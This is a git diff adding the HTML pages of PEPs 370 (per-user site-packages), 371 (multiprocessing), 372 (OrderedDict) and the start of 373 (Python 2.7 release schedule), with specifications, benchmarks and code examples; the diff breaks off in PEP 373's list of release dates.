\ No newline at end of file diff --git a/pep-0370/index.html b/pep-0370/index.html new file mode 100644 index 00000000000..34ae7bd133e --- /dev/null +++ b/pep-0370/index.html @@ -0,0 +1,353 @@ PEP 370 – Per user site-packages directory | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 370 – Per user site-packages directory

+
+
Author:
+
Christian Heimes <christian at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Jan-2008
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new per-user site-packages directory to allow users the local installation of Python packages in their home directory.

+
+
+

Rationale

+

Current Python versions don’t have a unified way to install packages +into the home directory of a user (except for Mac Framework +builds). Users are either forced to ask the system administrator to +install or update a package for them or to use one of the many +workarounds like Virtual Python [1], Working Env [2] or +Virtual Env [3].

+

It’s not the goal of the PEP to replace the tools or to implement +isolated installations of Python. It only implements the most common +use case of an additional site-packages directory for each user.

+

The feature can’t be implemented using the environment variable PYTHONPATH. The env var just inserts a new directory at the beginning of sys.path but it doesn’t parse the pth files in the directory. A full blown site-packages path is required for several applications and Python eggs.

+
+
+

Specification

+

site directory (site-packages)

+
+
A directory in sys.path. In contrast to ordinary directories the pth +files in the directory are processed, too.
+

user site directory

+
+
A site directory inside the user’s home directory. A user site directory is specific to a Python version. The path contains the version number (major and minor only).
+
Unix (including Mac OS X)
~/.local/lib/python2.6/site-packages
+
Windows
%APPDATA%/Python/Python26/site-packages
+
+
+

user data directory

+
+
Usually the parent directory of the user site directory. It’s meant +for Python version specific data like config files, docs, images +and translations.
+
Unix (including Mac)
~/.local/lib/python2.6
+
Windows
%APPDATA%/Python/Python26
+
+
+

user base directory

+
+
It’s located inside the user’s home directory. The user site and user config directories are inside the base directory. On some systems the directory may be shared with 3rd party apps.
+
Unix (including Mac)
~/.local
+
Windows
%APPDATA%/Python
+
+
+

user script directory

+
+
A directory for binaries and scripts. [10] It’s shared across Python versions and is the destination directory for scripts.
+
Unix (including Mac)
~/.local/bin
+
Windows
%APPDATA%/Python/Scripts
+
+
+
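The default locations above could be derived at runtime roughly as follows. This is a sketch only, not the actual site.py code, and it ignores the PYTHONUSERBASE override described later:

import os
import sys

major, minor = sys.version_info[:2]
if sys.platform == 'win32':
    user_base = os.path.join(os.environ['APPDATA'], 'Python')
    user_site = os.path.join(user_base, 'Python%d%d' % (major, minor),
                             'site-packages')
else:
    user_base = os.path.expanduser('~/.local')
    user_site = os.path.join(user_base, 'lib',
                             'python%d.%d' % (major, minor),
                             'site-packages')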
+

Windows Notes

+

On Windows the Application Data directory (aka APPDATA) was chosen +because it is the most designated place for application data. Microsoft +recommends that software doesn’t write to USERPROFILE [5] and +My Documents is not suited for application data, either. [8] The code +doesn’t query the Win32 API, instead it uses the environment variable +%APPDATA%.

+

The application data directory is part of the roaming profile. In networks with domain logins the application data may be copied from and to a central server. This can slow down log-in and log-off. Users can keep the data on the server by e.g. setting PYTHONUSERBASE to the value “%HOMEDRIVE%%HOMEPATH%\Application Data”. Users should consult their local administrator for more information. [13]

+
+
+

Unix Notes

+

On Unix ~/.local was chosen in favor over ~/.python because the +directory is already used by several other programs in analogy to +/usr/local. [7] [11]

+
+
+

Mac OS X Notes

+

On Mac OS X Python uses ~/.local directory as well. [12] Framework builds +of Python include ~/Library/Python/2.6/site-packages as an additional +search path.

+
+
+
+

Implementation

+

The site module gets a new method adduserpackage() which adds the +appropriate directory to the search path. The directory is not added if +it doesn’t exist when Python is started. However the location of the +user site directory and user base directory is stored in an internal +variable for distutils.

+

The user site directory is added before the system site directories +but after Python’s search paths and PYTHONPATH. This setup allows +the user to install a different version of a package than the system +administrator but it prevents the user from accidentally overwriting a +stdlib module. Stdlib modules can still be overwritten with +PYTHONPATH.

+

For security reasons the user site directory is not added to +sys.path when the effective user id or group id is not equal to the +process uid / gid [9]. It’s an additional barrier against code injection +into suid apps. However Python suid scripts must always use the -E +and -s option or users can sneak in their own code.

+

The user site directory can be suppressed with a new option -s or +the environment variable PYTHONNOUSERSITE. The feature can be +disabled globally by setting site.ENABLE_USER_SITE to the value +False. It must be set by editing site.py. It can’t be altered +in sitecustomize.py or later.

+
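The resulting state can be inspected at runtime; a small example against the implementation that landed with this PEP in Python 2.6:

import site

# True  - the user site directory is enabled and added to sys.path
# False - disabled via -s, PYTHONNOUSERSITE or an edited site.py
# None  - disabled for security reasons (mismatching uid/gid)
print site.ENABLE_USER_SITE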

The path to the user base directory can be overwritten with the +environment variable PYTHONUSERBASE. The default location is used +when PYTHONUSERBASE is not set or empty.

+

distutils.command.install (setup.py install) gets a new argument +--user to install packages in the user site directory. The required +directories are created on demand.

+

distutils.command.build_ext (setup.py build_ext) gets a new argument +--user which adds the include/ and lib/ directories in the user base +directory to the search paths for header files and libraries. It also +adds the lib/ directory to rpath.

+

The site module gets two arguments --user-base and --user-site +to print the path to the user base or user site directory to the standard +output. The feature is intended for scripting, e.g. +./configure --prefix $(python2.5 -m site --user-base)

+

distutils.sysconfig will get methods to access the private variables +of site. (not yet implemented)

+

The Windows updater needs to be updated, too. It should create a menu item which opens the user site directory in a new explorer window.

+
+
+

Backwards Compatibility

+

TBD

+
+
+

Reference Implementation

+

A reference implementation is available in the bug tracker. [4]

+
+ +
+

References

+ +

[6] Initial suggestion for a per user site-packages directory + https://mail.python.org/archives/list/python-dev@python.org/message/V23CUKRH3VCHFLV33ADMHJSM53STPA7I/

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0370.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0371/index.html b/pep-0371/index.html new file mode 100644 index 00000000000..1747c723055 --- /dev/null +++ b/pep-0371/index.html @@ -0,0 +1,535 @@ PEP 371 – Addition of the multiprocessing package to the standard library | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 371 – Addition of the multiprocessing package to the standard library

+
+
Author:
+
Jesse Noller <jnoller at gmail.com>, +Richard Oudkerk <r.m.oudkerk at googlemail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
06-May-2008
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
03-Jun-2008
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the inclusion of the pyProcessing [1] package +into the Python standard library, renamed to “multiprocessing”.

+

The processing package mimics the standard library threading +module functionality to provide a process-based approach to +threaded programming allowing end-users to dispatch multiple +tasks that effectively side-step the global interpreter lock.

+

The package also provides server and client functionality +(processing.Manager) to provide remote sharing and management of +objects and tasks so that applications may not only leverage +multiple cores on the local machine, but also distribute objects +and tasks across a cluster of networked machines.

+

While the distributed capabilities of the package are beneficial, +the primary focus of this PEP is the core threading-like API and +capabilities of the package.

+
+
+

Rationale

+

The current CPython interpreter implements the Global Interpreter +Lock (GIL) and barring work in Python 3000 or other versions +currently planned [2], the GIL will remain as-is within the +CPython interpreter for the foreseeable future. While the GIL +itself enables clean and easy to maintain C code for the +interpreter and extensions base, it is frequently an issue for +those Python programmers who are leveraging multi-core machines.

+

The GIL itself prevents more than a single thread from running +within the interpreter at any given point in time, effectively +removing Python’s ability to take advantage of multi-processor +systems.

+

The pyprocessing package offers a method to side-step the GIL +allowing applications within CPython to take advantage of +multi-core architectures without asking users to completely change +their programming paradigm (i.e.: dropping threaded programming +for another “concurrent” approach - Twisted, Actors, etc).

+

The Processing package offers CPython a “known API” which mirrors, albeit in a PEP 8 compliant manner, that of the threading API, with known semantics and easy scalability.

+

In the future, the package might not be as relevant should the +CPython interpreter enable “true” threading, however for some +applications, forking an OS process may sometimes be more +desirable than using lightweight threads, especially on those +platforms where process creation is fast and optimized.

+

For example, a simple threaded application:

+
from threading import Thread as worker
+
+def afunc(number):
+    print number * 3
+
+t = worker(target=afunc, args=(4,))
+t.start()
+t.join()
+
+
+

The pyprocessing package mirrored the API so well, that with a +simple change of the import to:

+
from processing import process as worker
+
+
+

The code would now execute through the processing.process class. +Obviously, with the renaming of the API to PEP 8 compliance there +would be additional renaming which would need to occur within +user applications, however minor.

+
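Under the final standard library spelling adopted by this PEP, the same example would read as follows. This is a sketch; the __main__ guard is included because child processes may re-import the main module on platforms without fork:

from multiprocessing import Process as worker

def afunc(number):
    print number * 3

if __name__ == '__main__':
    t = worker(target=afunc, args=(4,))
    t.start()
    t.join()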

This type of compatibility means that, with a minor (in most cases) change in code, users’ applications will be able to leverage all cores and processors on a given machine for parallel execution. In many cases the pyprocessing package is even faster than the normal threading approach for I/O bound programs. This, of course, takes into account that the pyprocessing package is in optimized C code, while the threading module is not.

+
+
+

The “Distributed” Problem

+

In the discussion on Python-Dev about the inclusion of this package [3] there was confusion about the intentions of this PEP, with an attempt to solve the “Distributed” problem - frequently comparing the functionality of this package with other solutions like MPI-based communication [4], CORBA, or other distributed object approaches [5].

+

The “distributed” problem is large and varied. Each programmer +working within this domain has either very strong opinions about +their favorite module/method or a highly customized problem for +which no existing solution works.

+

The acceptance of this package neither precludes nor discourages programmers working on the “distributed” problem from examining other solutions for their problem domain. The intent of including this package is to provide entry-level capabilities for local concurrency and the basic support to spread that concurrency across a network of machines - although the two are not tightly coupled, the pyprocessing package could in fact be used in conjunction with any of the other solutions including MPI/etc.

+

If necessary - it is possible to completely decouple the local +concurrency abilities of the package from the +network-capable/shared aspects of the package. Without serious +concerns or cause however, the author of this PEP does not +recommend that approach.

+
+
+

Performance Comparison

+

As we all know - there are “lies, damned lies, and benchmarks”. +These speed comparisons, while aimed at showcasing the performance +of the pyprocessing package, are by no means comprehensive or +applicable to all possible use cases or environments. Especially +for those platforms with sluggish process forking timing.

+

All benchmarks were run using the following:

+
    +
  • 4 Core Intel Xeon CPU @ 3.00GHz
  • +
  • 16 GB of RAM
  • +
  • Python 2.5.2 compiled on Gentoo Linux (kernel 2.6.18.6)
  • +
  • pyProcessing 0.52
  • +
+

All of the code for this can be downloaded from +http://jessenoller.com/code/bench-src.tgz

+

The basic method of execution for these benchmarks is in the +run_benchmarks.py [6] script, which is simply a wrapper to execute a +target function through a single threaded (linear), multi-threaded +(via threading), and multi-process (via pyprocessing) function for +a static number of iterations with increasing numbers of execution +loops and/or threads.

+

The run_benchmarks.py script executes each function 100 times, +picking the best run of that 100 iterations via the timeit module.

+
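The best-of-100 timing idiom described above looks roughly like this (a sketch, not the actual run_benchmarks.py code):

import timeit

def best_run(stmt, setup='pass', runs=100):
    # time `stmt` once per run and keep the fastest of `runs` runs
    timer = timeit.Timer(stmt, setup)
    return min(timer.repeat(repeat=runs, number=1))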

First, to identify the overhead of the spawning of the workers, we +execute a function which is simply a pass statement (empty):

+
cmd: python run_benchmarks.py empty_func.py
+Importing empty_func
+Starting tests ...
+non_threaded (1 iters)  0.000001 seconds
+threaded (1 threads)    0.000796 seconds
+processes (1 procs)     0.000714 seconds
+
+non_threaded (2 iters)  0.000002 seconds
+threaded (2 threads)    0.001963 seconds
+processes (2 procs)     0.001466 seconds
+
+non_threaded (4 iters)  0.000002 seconds
+threaded (4 threads)    0.003986 seconds
+processes (4 procs)     0.002701 seconds
+
+non_threaded (8 iters)  0.000003 seconds
+threaded (8 threads)    0.007990 seconds
+processes (8 procs)     0.005512 seconds
+
+
+

As you can see, process forking via the pyprocessing package is +faster than the speed of building and then executing the threaded +version of the code.

+

The second test calculates 50000 Fibonacci numbers inside of each +thread (isolated and shared nothing):

+
cmd: python run_benchmarks.py fibonacci.py
+Importing fibonacci
+Starting tests ...
+non_threaded (1 iters)  0.195548 seconds
+threaded (1 threads)    0.197909 seconds
+processes (1 procs)     0.201175 seconds
+
+non_threaded (2 iters)  0.397540 seconds
+threaded (2 threads)    0.397637 seconds
+processes (2 procs)     0.204265 seconds
+
+non_threaded (4 iters)  0.795333 seconds
+threaded (4 threads)    0.797262 seconds
+processes (4 procs)     0.206990 seconds
+
+non_threaded (8 iters)  1.591680 seconds
+threaded (8 threads)    1.596824 seconds
+processes (8 procs)     0.417899 seconds
+
+
+

The third test calculates the sum of all primes below 100000, +again sharing nothing:

+
cmd: run_benchmarks.py crunch_primes.py
+Importing crunch_primes
+Starting tests ...
+non_threaded (1 iters)  0.495157 seconds
+threaded (1 threads)    0.522320 seconds
+processes (1 procs)     0.523757 seconds
+
+non_threaded (2 iters)  1.052048 seconds
+threaded (2 threads)    1.154726 seconds
+processes (2 procs)     0.524603 seconds
+
+non_threaded (4 iters)  2.104733 seconds
+threaded (4 threads)    2.455215 seconds
+processes (4 procs)     0.530688 seconds
+
+non_threaded (8 iters)  4.217455 seconds
+threaded (8 threads)    5.109192 seconds
+processes (8 procs)     1.077939 seconds
+
+
+

The reason why tests two and three focused on pure numeric +crunching is to showcase how the current threading implementation +does hinder non-I/O applications. Obviously, these tests could be +improved to use a queue for coordination of results and chunks of +work but that is not required to show the performance of the +package and core processing.process module.

+

The next test is an I/O bound test. This is normally where we see +a steep improvement in the threading module approach versus a +single-threaded approach. In this case, each worker is opening a +descriptor to lorem.txt, randomly seeking within it and writing +lines to /dev/null:

+
cmd: python run_benchmarks.py file_io.py
+Importing file_io
+Starting tests ...
+non_threaded (1 iters)  0.057750 seconds
+threaded (1 threads)    0.089992 seconds
+processes (1 procs)     0.090817 seconds
+
+non_threaded (2 iters)  0.180256 seconds
+threaded (2 threads)    0.329961 seconds
+processes (2 procs)     0.096683 seconds
+
+non_threaded (4 iters)  0.370841 seconds
+threaded (4 threads)    1.103678 seconds
+processes (4 procs)     0.101535 seconds
+
+non_threaded (8 iters)  0.749571 seconds
+threaded (8 threads)    2.437204 seconds
+processes (8 procs)     0.203438 seconds
+
+
+

As you can see, pyprocessing is still faster on this I/O operation +than using multiple threads. And using multiple threads is slower +than the single threaded execution itself.

+

Finally, we will run a socket-based test to show network I/O +performance. This function grabs a URL from a server on the LAN +that is a simple error page from tomcat. It gets the page 100 +times. The network is silent, and a 10G connection:

+
cmd: python run_benchmarks.py url_get.py
+Importing url_get
+Starting tests ...
+non_threaded (1 iters)  0.124774 seconds
+threaded (1 threads)    0.120478 seconds
+processes (1 procs)     0.121404 seconds
+
+non_threaded (2 iters)  0.239574 seconds
+threaded (2 threads)    0.146138 seconds
+processes (2 procs)     0.138366 seconds
+
+non_threaded (4 iters)  0.479159 seconds
+threaded (4 threads)    0.200985 seconds
+processes (4 procs)     0.188847 seconds
+
+non_threaded (8 iters)  0.960621 seconds
+threaded (8 threads)    0.659298 seconds
+processes (8 procs)     0.298625 seconds
+
+
+

We finally see threaded performance surpass that of +single-threaded execution, but the pyprocessing package is still +faster when increasing the number of workers. If you stay with +one or two threads/workers, then the timing between threads and +pyprocessing is fairly close.

+

One item of note however, is that there is an implicit overhead +within the pyprocessing package’s Queue implementation due to the +object serialization.

+

Alec Thomas provided a short example based on the +run_benchmarks.py script to demonstrate this overhead versus the +default Queue implementation:

+
cmd: run_bench_queue.py
+non_threaded (1 iters)  0.010546 seconds
+threaded (1 threads)    0.015164 seconds
+processes (1 procs)     0.066167 seconds
+
+non_threaded (2 iters)  0.020768 seconds
+threaded (2 threads)    0.041635 seconds
+processes (2 procs)     0.084270 seconds
+
+non_threaded (4 iters)  0.041718 seconds
+threaded (4 threads)    0.086394 seconds
+processes (4 procs)     0.144176 seconds
+
+non_threaded (8 iters)  0.083488 seconds
+threaded (8 threads)    0.184254 seconds
+processes (8 procs)     0.302999 seconds
+
+
+

Additional benchmarks can be found in the pyprocessing package’s +source distribution’s examples/ directory. The examples will be +included in the package’s documentation.

+
+
+

Maintenance

+

Richard M. Oudkerk - the author of the pyprocessing package has +agreed to maintain the package within Python SVN. Jesse Noller +has volunteered to also help maintain/document and test the +package.

+
+
+

API Naming

+

While the package’s API is designed to closely mimic that of the threading and Queue modules as of Python 2.x, those modules are not PEP 8 compliant. It has been decided that instead of adding the package “as is” and therefore perpetuating the non-PEP 8 compliant naming, we will rename all APIs, classes, etc. to be fully PEP 8 compliant.

+

This change does affect the ease of drop-in replacement for those using the threading module, but that is an acceptable side-effect in the view of the authors, especially given that the threading module’s own API will change.

+

Issue 3042 in the tracker proposes that for Python 2.6 there will be +two APIs for the threading module - the current one, and the PEP 8 +compliant one. Warnings about the upcoming removal of the original +java-style API will be issued when -3 is invoked.

+

In Python 3000, the threading API will become PEP 8 compliant, which +means that the multiprocessing module and the threading module will +again have matching APIs.

+
+
+

Timing/Schedule

+

Some concerns have been raised about the timing/lateness of this +PEP for the 2.6 and 3.0 releases this year, however it is felt by +both the authors and others that the functionality this package +offers surpasses the risk of inclusion.

+

However, taking into account the desire not to destabilize +Python-core, some refactoring of pyprocessing’s code “into” +Python-core can be withheld until the next 2.x/3.x releases. This +means that the actual risk to Python-core is minimal, and largely +constrained to the actual package itself.

+
+
+

Open Issues

+
    +
  • Confirm no “default” remote connection capabilities, if needed +enable the remote security mechanisms by default for those +classes which offer remote capabilities.
  • +
  • Some of the API (Queue methods qsize(), task_done() and join()) +either need to be added, or the reason for their exclusion needs +to be identified and documented clearly.
  • +
+
+
+

Closed Issues

+
    +
  • The PyGILState bug patch submitted in issue 1683 by roudkerk +must be applied for the package unit tests to work.
  • +
  • Existing documentation has to be moved to ReST formatting.
  • +
  • Reliance on ctypes: The pyprocessing package’s reliance on +ctypes prevents the package from functioning on platforms where +ctypes is not supported. This is not a restriction of this +package, but rather of ctypes.
  • +
  • DONE: Rename top-level package from “pyprocessing” to +“multiprocessing”.
  • +
  • DONE: Also note that the default behavior of process spawning +does not make it compatible with use within IDLE as-is, this +will be examined as a bug-fix or “setExecutable” enhancement.
  • +
  • DONE: Add in “multiprocessing.setExecutable()” method to override the +default behavior of the package to spawn processes using the +current executable name rather than the Python interpreter. Note +that Mark Hammond has suggested a factory-style interface for +this [7].
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0371.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0372/index.html b/pep-0372/index.html new file mode 100644 index 00000000000..de2877d45ad --- /dev/null +++ b/pep-0372/index.html @@ -0,0 +1,405 @@ PEP 372 – Adding an ordered dictionary to collections | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 372 – Adding an ordered dictionary to collections

+
+
Author:
+
Armin Ronacher <armin.ronacher at active-4.com>, +Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Jun-2008
+
Python-Version:
+
2.7, 3.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an ordered dictionary as a new data structure for +the collections module, called “OrderedDict” in this PEP. The +proposed API incorporates the experiences gained from working with +similar implementations that exist in various real-world applications +and other programming languages.

+
+
+

Patch

+

A working Py3.1 patch including tests and documentation is at:

+
+
+

The check-in was in revisions: 70101 and 70102

+
+
+

Rationale

+

In current Python versions, the widely used built-in dict type does +not specify an order for the key/value pairs stored. This makes it +hard to use dictionaries as data storage for some specific use cases.

+

Some dynamic programming languages like PHP and Ruby 1.9 guarantee a +certain order on iteration. In those languages, and existing Python +ordered-dict implementations, the ordering of items is defined by the +time of insertion of the key. New keys are appended at the end, but +keys that are overwritten are not moved to the end.

+

The following example shows the behavior for simple assignments:

+
>>> d = OrderedDict()
+>>> d['parrot'] = 'dead'
+>>> d['penguin'] = 'exploded'
+>>> d.items()
+[('parrot', 'dead'), ('penguin', 'exploded')]
+
+
+

That the ordering is preserved makes an OrderedDict useful for a couple of +situations:

+
    +
  • XML/HTML processing libraries currently drop the ordering of +attributes, use a list instead of a dict which makes filtering +cumbersome, or implement their own ordered dictionary. This affects +ElementTree, html5lib, Genshi and many more libraries.
  • +
  • There are many ordered dict implementations in various libraries +and applications, most of them subtly incompatible with each other. +Furthermore, subclassing dict is a non-trivial task and many +implementations don’t override all the methods properly which can +lead to unexpected results.

    Additionally, many ordered dicts are implemented in an inefficient way, making many operations more complex than they have to be.

    +
  • +
  • PEP 3115 allows metaclasses to change the mapping object used for +the class body. An ordered dict could be used to create ordered +member declarations similar to C structs. This could be useful, for +example, for future ctypes releases as well as ORMs that define +database tables as classes, like the one the Django framework ships. +Django currently uses an ugly hack to restore the ordering of +members in database models.
  • +
  • The RawConfigParser class accepts a dict_type argument that +allows an application to set the type of dictionary used internally. +The motivation for this addition was expressly to allow users to +provide an ordered dictionary. [1]
  • +
  • Code ported from other programming languages such as PHP often +depends on an ordered dict. Having an implementation of an +ordering-preserving dictionary in the standard library could ease +the transition and improve the compatibility of different libraries.
  • +
+
+
+

Ordered Dict API

+

The ordered dict API would be mostly compatible with dict and existing ordered dicts. Note: this PEP refers to the 2.7 and 3.0 dictionary API as described in the collections.Mapping abstract base class.

+

The constructor and update() both accept iterables of tuples as +well as mappings like a dict does. Unlike a regular dictionary, +the insertion order is preserved.

+
>>> d = OrderedDict([('a', 'b'), ('c', 'd')])
+>>> d.update({'foo': 'bar'})
+>>> d
+collections.OrderedDict([('a', 'b'), ('c', 'd'), ('foo', 'bar')])
+
+
+

If ordered dicts are updated from regular dicts, the ordering of new +keys is of course undefined.

+

All iteration methods as well as keys(), values() and +items() return the values ordered by the time the key was +first inserted:

+
>>> d['spam'] = 'eggs'
+>>> d.keys()
+['a', 'c', 'foo', 'spam']
+>>> d.values()
+['b', 'd', 'bar', 'eggs']
+>>> d.items()
+[('a', 'b'), ('c', 'd'), ('foo', 'bar'), ('spam', 'eggs')]
+
+
+

New methods not available on dict:

+
+
OrderedDict.__reversed__()
Supports reverse iteration by key.
+
+
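Continuing the example above, reverse iteration would look like:

>>> list(reversed(d))
['spam', 'foo', 'c', 'a']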
+
+

Questions and Answers

+

What happens if an existing key is reassigned?

+
+
The key is not moved but assigned a new value in place. This is +consistent with existing implementations.
+

What happens if keys appear multiple times in the list passed to the +constructor?

+
+
The same as for regular dicts – the latter item overrides the +former. This has the side-effect that the position of the first +key is used because only the value is actually overwritten:
>>> OrderedDict([('a', 1), ('b', 2), ('a', 3)])
+collections.OrderedDict([('a', 3), ('b', 2)])
+
+
+

This behavior is consistent with existing implementations in +Python, the PHP array and the hashmap in Ruby 1.9.

+
+

Is the ordered dict a dict subclass? Why?

+
+
Yes. Like defaultdict, an ordered dictionary subclasses dict. Being a dict subclass makes some of the methods faster (like __getitem__ and __len__). More importantly, being a dict subclass lets ordered dictionaries be usable with tools like json that insist on having dict inputs by testing isinstance(d, dict).
+

Do any limitations arise from subclassing dict?

+
+
Yes. Since the API for dicts is different in Py2.x and Py3.x, the +OrderedDict API must also be different. So, the Py2.7 version will need +to override iterkeys, itervalues, and iteritems.
+

Does OrderedDict.popitem() return a particular key/value pair?

+
+
Yes. It pops off the most recently inserted new key and its corresponding value. This corresponds to the usual LIFO behavior exhibited by traditional push/pop pairs. It is semantically equivalent to k=list(od)[-1]; v=od[k]; del od[k]; return (k,v). The actual implementation is more efficient and pops directly from a sorted list of keys.
+

Does OrderedDict support indexing, slicing, and whatnot?

+
+
As a matter of fact, OrderedDict does not implement the Sequence +interface. Rather, it is a MutableMapping that remembers +the order of key insertion. The only sequence-like addition is +support for reversed.

A further advantage of not allowing indexing is that it leaves open +the possibility of a fast C implementation using linked lists.

+
+

Does OrderedDict support alternate sort orders such as alphabetical?

+
+
No. Those wanting different sort orders really need to be using another +technique. The OrderedDict is all about recording insertion order. If any +other order is of interest, then another structure (like an in-memory +dbm) is likely a better fit.
+

How well does OrderedDict work with the json module, PyYAML, and ConfigParser?

+
+
For json, the good news is that json’s encoder respects OrderedDict’s iteration order:
>>> items = [('one', 1), ('two', 2), ('three',3), ('four',4), ('five',5)]
+>>> json.dumps(OrderedDict(items))
+'{"one": 1, "two": 2, "three": 3, "four": 4, "five": 5}'
+
+
+

In Py2.6, the object_hook for json decoders passes-in an already built +dictionary so order is lost before the object hook sees it. This +problem is being fixed for Python 2.7/3.1 by adding a new hook that +preserves order (see https://github.com/python/cpython/issues/49631 ). +With the new hook, order can be preserved:

+
>>> jtext = '{"one": 1, "two": 2, "three": 3, "four": 4, "five": 5}'
+>>> json.loads(jtext, object_pairs_hook=OrderedDict)
+OrderedDict({'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5})
+
+
+

For PyYAML, a full round-trip is problem free:

+
>>> ytext = yaml.dump(OrderedDict(items))
+>>> print ytext
+!!python/object/apply:collections.OrderedDict
+- - [one, 1]
+  - [two, 2]
+  - [three, 3]
+  - [four, 4]
+  - [five, 5]
+
+>>> yaml.load(ytext)
+OrderedDict({'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5})
+
+
+

For the ConfigParser module, round-tripping is also problem free. Custom +dicts were added in Py2.6 specifically to support ordered dictionaries:

+
>>> config = ConfigParser(dict_type=OrderedDict)
+>>> config.read('myconfig.ini')
+>>> config.remove_option('Log', 'error')
+>>> config.write(open('myconfig.ini', 'w'))
+
+
+
+

How does OrderedDict handle equality testing?

+
+
Comparing two ordered dictionaries implies that the test will be order-sensitive, so that list(od1.items()) == list(od2.items()).

When ordered dicts are compared with other Mappings, their order +insensitive comparison is used. This allows ordered dictionaries +to be substituted anywhere regular dictionaries are used.

+
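For example, under these semantics:

>>> od1 = OrderedDict([('a', 1), ('b', 2)])
>>> od2 = OrderedDict([('b', 2), ('a', 1)])
>>> od1 == od2          # both ordered: comparison is order-sensitive
False
>>> od1 == dict(od2)    # mixed with a plain dict: order is ignored
True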
+

How __repr__ format will maintain order during a repr/eval round-trip?

+
+
OrderedDict([('a', 1), ('b', 2)])
+

What are the trade-offs of the possible underlying data structures?

+
+
    +
  • Keeping a sorted list of keys is fast for all operations except __delitem__(), which becomes an O(n) exercise (a sketch of this approach follows this list). This data structure leads to very simple code and little wasted space.
  • +
  • Keeping a separate dictionary to record insertion sequence numbers makes the code a little bit more complex. All of the basic operations are O(1) but the constant factor is increased for __setitem__() and __delitem__(), meaning that every use case will have to pay for this speedup (since all buildup goes through __setitem__). Also, the first traversal incurs a one-time O(n log n) sorting cost. The storage costs are double that of the sorted-list-of-keys approach.
  • +
  • A version written in C could use a linked list. The code would be more +complex than the other two approaches but it would conserve space and +would keep the same big-oh performance as regular dictionaries. It is +the fastest and most space efficient.
  • +
+
+
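As an illustration of the first approach, here is a minimal sketch. It is not the proposed implementation and supports only the handful of methods shown:

class ListKeyedDict(dict):
    # Keeps a list of keys in insertion order; __delitem__ is O(n).

    def __init__(self):
        dict.__init__(self)
        self._keys = []

    def __setitem__(self, key, value):
        if key not in self:
            self._keys.append(key)      # new keys are appended
        dict.__setitem__(self, key, value)

    def __delitem__(self, key):
        dict.__delitem__(self, key)
        self._keys.remove(key)          # the O(n) step noted above

    def __iter__(self):
        return iter(self._keys)

    def items(self):
        return [(key, self[key]) for key in self._keys]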
+
+

Reference Implementation

+

An implementation with tests and documentation is at:

+
+
+

The proposed version has several merits:

+
    +
  • Strict compliance with the MutableMapping API and no new methods +so that the learning curve is near zero. It is simply a dictionary +that remembers insertion order.
  • +
  • Generally good performance. The big-oh times are the same as regular +dictionaries except that key deletion is O(n).
  • +
+

Other implementations of ordered dicts in various Python projects or +standalone libraries, that inspired the API proposed here, are:

+ +
+
+

Future Directions

+

With the availability of an ordered dict in the standard library, +other libraries may take advantage of that. For example, ElementTree +could return odicts in the future that retain the attribute ordering +of the source file.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0372.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0373/index.html b/pep-0373/index.html new file mode 100644 index 00000000000..f779741edca --- /dev/null +++ b/pep-0373/index.html @@ -0,0 +1,253 @@ PEP 373 – Python 2.7 Release Schedule | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 373 – Python 2.7 Release Schedule

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
03-Nov-2008
+
Python-Version:
+
2.7
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.7.

+

Python 2.7 is the end of the Python 2.x series, and is succeeded by +Python 3. See the “Sunsetting Python 2” FAQ on python.org for a general +overview.

+
+
+

Update (April 2014)

+

The End Of Life date (EOL, sunset date) for Python 2.7 has been moved +five years into the future, to 2020. This decision was made to +clarify the status of Python 2.7 and relieve worries for those users +who cannot yet migrate to Python 3. See also PEP 466.

+

This declaration does not guarantee that bugfix releases will be made +on a regular basis, but it should enable volunteers who want to +contribute bugfixes for Python 2.7 and it should satisfy vendors who +still have to support Python 2 for years to come.

+

There will be no Python 2.8 (see PEP 404).

+
+
+

Release Manager and Crew

+ + + + + + + + + + + + + + + + + +
PositionName
2.7 Release ManagerBenjamin Peterson
Windows installersSteve Dower
Mac installersNed Deily
+
+
+

Maintenance releases

+

Being the last of the 2.x series, 2.7 received bugfix support until +2020. Support officially stopped January 1 2020, and 2.7.18 code +freeze occurred on January 1 2020, but the final release occurred +after that date.

+

Dates of previous maintenance releases:

+
    +
  • 2.7.1 2010-11-27
  • +
  • 2.7.2 2011-07-21
  • +
  • 2.7.3rc1 2012-02-23
  • +
  • 2.7.3rc2 2012-03-15
  • +
  • 2.7.3 2012-04-09
  • +
  • 2.7.4rc1 2013-03-23
  • +
  • 2.7.4 2013-04-06
  • +
  • 2.7.5 2013-05-12
  • +
  • 2.7.6rc1 2013-10-26
  • +
  • 2.7.6 2013-11-10
  • +
  • 2.7.7rc1 2014-05-17
  • +
  • 2.7.7 2014-05-31
  • +
  • 2.7.8 2014-06-30
  • +
  • 2.7.9rc1 2014-11-26
  • +
  • 2.7.9 2014-12-10
  • +
  • 2.7.10rc1 2015-05-09
  • +
  • 2.7.10 2015-05-23
  • +
  • 2.7.11rc1 2015-11-21
  • +
